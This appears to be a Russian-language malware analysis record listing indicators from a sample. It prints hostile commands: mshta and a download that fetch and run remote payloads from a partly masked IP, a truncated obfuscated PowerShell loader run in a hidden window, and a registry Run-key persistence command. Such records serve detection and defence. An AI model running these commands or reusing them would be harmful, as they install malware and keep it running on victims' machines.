Техническая информация
- '<SYSTEM32>\mshta.exe' http://17#.#3.175.187/swih/blow.hta
- '%APPDATA%\pico.exe'
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 53
- %APPDATA%\pico.exe
- '17#.#3.175.187':80
- http://17#.#3.175.187/swih/blow.hta
- http://17#.#3.175.187/swih/pico.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function O($IA, $nB){[IO.File]::WriteAllBytes($IA, $nB)};function k($IA){if($IA.EndsWith((IS @(14374,14428,14436,14436))) -eq $True){Start-Process (IS @(14442,1444...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ping 127.0.0.1 -n 53 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "dynu" /t REG_SZ /d "%LOCALAPPDATA%\drv\thar.exe"